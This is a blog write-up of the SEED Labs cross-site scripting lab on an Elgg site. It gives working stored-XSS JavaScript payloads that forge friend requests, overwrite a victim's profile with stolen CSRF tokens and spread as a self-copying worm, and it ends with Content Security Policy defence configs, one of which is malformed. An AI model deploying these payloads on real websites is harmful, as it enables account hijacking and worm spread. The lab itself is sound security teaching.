Based on seedubuntu20 04 cross site scripting attack (XSS)

Posted by aruns on Mon, 27 Dec 2021 06:46:23 +0100

XSS attack is similar to CSRF, but it is more difficult and common than CSRF.

CSRF is to forge a cross site request. He has to cheat others into his well-designed website first, but when an untrusted third-party website jumps, the site will often intimate remind you of the risk of being attacked. But the cross site scripting attack is different. It can insert the code into the source code of a trusted website.

We often find pop-up windows and astringent advertisements in some strange websites. It is often that the website has been attacked and the malicious code of the attacker has been implanted in the web code. This situation is common in some abandoned websites. Abandoned websites are vulnerable to attack due to lack of maintenance.

I Inject Javascript code into Elgg

The experimental mice are based on Elgg social software specially prepared for future hackers. If you don't know, please refer to my last blog

Cross Site Request Forgery -- CSRF attack experiment report

1. Log in to Samy's account and enter the profile page

2. Click Edit HTML in the upper right corner to enter the HTML file editing mode, and fill in the following contents in the "About Me" column

<script>alert("XSS");</script>

3. Exit

4. Log in to Alice's account and enter the "Members" page

5. Access Samy's profile, Javascript malicious code is executed, and you can see the XSS window pop up

II Add Samy as Alice's friend

1. Investigation

Enter Charlie's account, add Samy as a friend, use HTTP header live to capture HTTP packets, analyze the fields and obtain the required information

2. Log in to Samy's account, enter the Edit profile page, enter the Edit HTML mode, and put the following Ajax code into it

(if you do not enter this mode, the editor will add formatted data to the code)

<script type="text/javascript">
window.onload=function()
{
    var Ajax=null;//The Javascript code is implemented with Ajax to facilitate the initiation of HTTP requests in the background and prevent the normal HTTP requests initiated by Javascript code from leaving the current page and causing users' doubts
    
    //Set the timestamp and secret token value so that the request is regarded as the same station request
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;//Assign the timestamp variable value in the Javascript code of the current page to elgg_ts
    var token="&__elgg_token="+elgg.security.token.__elgg_token;//Assign the secret token variable value in the Javascript code of the current page to elgg_ts
    
    //Create url
    var sendurl="http://www.seed-server.com/action/friends/add "/ / add friends page
    			+"?friend=59" + token + ts;//Add the friend ID, token and ts fields to form the url
    
    //Create and send Ajax requests to add friends
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.send();
}
</script>

reflection:

If Samy browses his profile interface, he will add himself as a friend

3. Log in to Alice's account, view Samy's profile page, and check whether to add Samy as your friend

Visible friend added successfully

III Modify Alice's profile

1. Investigation

Enter Samy's account, modify the profile, observe the HTTP message structure through HTTP header live, and obtain the required field information

2. According to the attack steps in 2, modify Samy's profile, add the following code and write it in Edit HTML format

<script type="text/javascript">
window.onload = function()
{

//Construct corresponding fields
var name="&name="+elgg.session.user.name;//Construct user name field
var guid="&guid="+elgg.session.user.guid;//guid field
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;//timestamp field 
var token="&__elgg_token="+elgg.security.token.__elgg_token;//Secret token field
var desc="&description=Samy is my hero" + "&accesslevel[description]=2"//Profile field + access control level field

//Construct url
var content=token + ts + name + desc + guid; 
var sendurl="http://www.seed-server.com/action/profile/edit "; / / url to send 

if(elgg.session.user.guid!=59)//Prevent Samy from modifying his profile
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>

Log in to Alice's account. At first, Alice didn't have a profile

After viewing Samy's profile, the following content appears in the About me area. The attack is successful and Alice's home page is successfully modified

IV Write self propagating worms

1. Write the worm and put it on the attacker Samy's home page

Here, the DOM tree is used to realize the self copy of JavaScript code

Change About me on Samy's home page to the following

<script type="text/javascript" id="worm">//On the original basis, set the script ID to worm to facilitate searching according to the ID in the DOM tree
window.onload = function()
{
//Construct worm copy code. Since innerHTML will not copy Javascript tags, you need to manually add headers and tails
var headerTag = "<script id=\"worm\" type=\"text/javascript\">"; //Code header
var jsCode = document.getElementById("worm").innerHTML;//Find the node with ID worm in the DOM tree, and use innerHTML api to get the specific content of the script (excluding tags) 
var tailTag = "</" + "script>"; //Code tail
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);//URL encode code 
alert(jsCode);
    
//Set the value of the description field and the value of the access level field
var desc = "&description=Samy is my hero" + wormCode;
desc += "&accesslevel[description]=2";

//Construct corresponding fields
var name="&name="+elgg.session.user.name;//Construct user name field
var guid="&guid="+elgg.session.user.guid;//guid field
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;//timestamp field 
var token="&__elgg_token="+elgg.security.token.__elgg_token;//Secret token field

//Construct url
var content=token + ts + name + desc + guid; 
var sendurl="http://www.seed-server.com/action/profile/edit "; / / url to send 

if(elgg.session.user.guid!=59)//Prevent Samy from modifying his profile
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>

2. Observe the first level attacker Alice

Click on Samy's home page, then observe his home page and find that it has been modified

3. Observe the second level attacker Boby

Click Alice's home page to pop up the code content, which indicates that Alice's home page has been infected with XSS worm, and Boby is being attacked

Click To observe Boby's home page and find that it has been modified. Samy successfully attacked boby

V Defensive measures

CSP content security policy is used here to prevent XSS attacks

1. Related configuration

Three websites www.example32a com, www.example32b. com, www.example32c. Com also uses the same HTML file, index HTML, which reads as follows

<html>
<h2 >CSP Experiment</h2>
<p>1. Inline: Nonce (111-111-111): <span id='area1'>Failed</span></p>#Region 1, nonce value 111-111-111
<p>2. Inline: Nonce (222-222-222): <span id='area2'>Failed</span></p>#Area 2, nonce value 222-222-222
<p>3. Inline: No Nonce: <span id='area3'>Failed</span></p>#Area 3, no nonce value
<p>4. From self: <span id='area4'>Failed</span></p>
<p>5. From www.example60.com: <span id='area5'>Failed</span></p>
<p>6. From www.example70.com: <span id='area6'>Failed</span></p>
<p>7. From button click:
<button οnclick="alert('JS Code executed!')">Click me</button></p>

#Script 1, set the nonce value to 111-111-111, and the script attempts to set the content of area 1 to OK
<script type="text/javascript" nonce="111-111-111">
document.getElementById('area1').innerHTML = "OK";
</script>

#Script 2, set the nonce value to 222-222-222, and the script attempts to set the content of area 2 to OK
<script type="text/javascript" nonce="222-222-222">
document.getElementById('area2').innerHTML = "OK";
</script>

#Script 3, without nonce value, attempts to set the content of area 3 to OK    
<script type="text/javascript">
document.getElementById('area3').innerHTML = "OK";
</script>

#Script 4, execute the script stored in this site_ area4. JS file  
<script src="script_area4.js"> </script>
    
#Script 5, the execution code is stored in http://www.example60.com Script for_ area5. JS file
<script src="http://www.example60.com/script_area5.js"> </script>

#Script 6, the execution code is stored in http://www.example70.com Script for_ area6. JS file
<script src="http://www.example70.com/script_area6.js"> </script>
</html>

2. Configure CSP

Two methods:

① The Apache server can set HTTP headers for all corresponding messages

② Configuring CSP in a network application

#www.example32a.com do not set CSP
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32a.com
DirectoryIndex index.html
</VirtualHost>

#www.example32b.com sets the CSP by setting the HTTP response message header through Apache (method ①)
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32b.com
DirectoryIndex index.html
Header set Content-Security-Policy " \ #Turn on CSP mode 
default-src 'self'; \ #Allow embedded Javascript scripts from this site
script-src 'self' *.example70.com \ #Allow from example70 Com embedded Javascript script
"
</VirtualHost>

#www.example32c.com set CSP through network application (method ②)
<VirtualHost *:80> 
DocumentRoot /var/www/csp
ServerName www.example32c.com
DirectoryIndex phpindex.php #Access the phpindex, php file to load the web page, and write the CSP configuration in the file
</VirtualHost>

phpindex.php

<?php
$cspheader = "Content-Security-Policy:". #Turn on CSP policy
"default-src 'self';". #Allow embedded Javascript scripts from this site
"script-src 'self' 'nonce-111-111-111' *.example70.com". #Allow embedded scripts from this site, from example70 Com embedded script,
    												#Embedded script with nonce value of 111-111-111
"";
header($cspheader);
?>
<?php include 'index.html';?>

3. Test web pages

(1). Open example32a com

**Observation result: * * all items are OK. Click the button to pop up a pop-up window

**Explanation: * * the website did not open the CSP defense mechanism, so all six script scripts were executed successfully

(2). Open example32b com

Explanation:

According to example32b According to the CSP configuration of COM, it is only allowed for this site and example70 COM, so index Scripts 4 and 6 in HTML were executed successfully

Scripts 1 and 2 use embedded scripts. Although there is a nonce value, no embedded code is allowed to use the nonce value for authentication in the CSP policy specified in the HTTP header

Script 3 is embedded code and will not be executed

Script 5 source website example60 COM is not trusted and will not be implemented

Button 7 belongs to embedded code and is not allowed, so the corresponding content is not displayed

(3). Open example32c com

Explanation:

According to example32c COM, you can see that it allows this site and example70 COM and embedded code with nonce value of 111-111-111, so the nonce value of script 1 is consistent, embedded and executed, and area 1 is displayed as OK; Script 4 is from this site and script 6 is from example70 COM, which are trusted sources and are executed

The nonce value of script 2 is 222-222-222, which is inconsistent with the value required by CSP configuration, so it will not be executed

Script 3 is embedded code and has no nonce value for authentication, so it will not be executed

Script 5 source website example60 COM is not trusted, so it will not be implemented

Button 7 belongs to embedded code and has no corresponding nonce value, so the corresponding content is not displayed

4. Modify code

(1). Modify example32b CSP configuration of com (modify Apache configuration) so that areas 5 and 6 are displayed as OK

#www.example32b.com sets the CSP by setting the HTTP response message header through Apache (method ①)
<VirtualHost *:80>
DocumentRoot /var/www/csp
ServerName www.example32b.com
DirectoryIndex index.html
Header set Content-Security-Policy " \ #Turn on CSP mode 
default-src 'self'; \ #Allow embedded Javascript scripts from this site
script-src 'self' *.example70.com \ #Allow from example70 com,example70. Com embedded Javascript script
script-src 'self' *.example60.com \ #Allow from example60 com,example70. Com embedded Javascript script
"
</VirtualHost>

(2). Modify example32c Com (modify the corresponding php code) so that areas 1, 2, 4, 5 and 6 are displayed as OK

<?php
$cspheader = "Content-Security-Policy:". #Turn on CSP policy
"default-src 'self';". #Allow embedded Javascript scripts from this site
"script-src 'self' 'nonce-111-111-111' 'nonce-222-222-222' *.example70.com *.example60.com". 
"";
header($cspheader);
?>
<?php include 'index.html';?>

5. Summary

CSP clearly tells the website which resources can be loaded and are trusted, so it can prevent XSS attacks from using scripts from untrusted sources to attack the website

Topics: security Web Security

Hot Topics

©2024 Programmer Think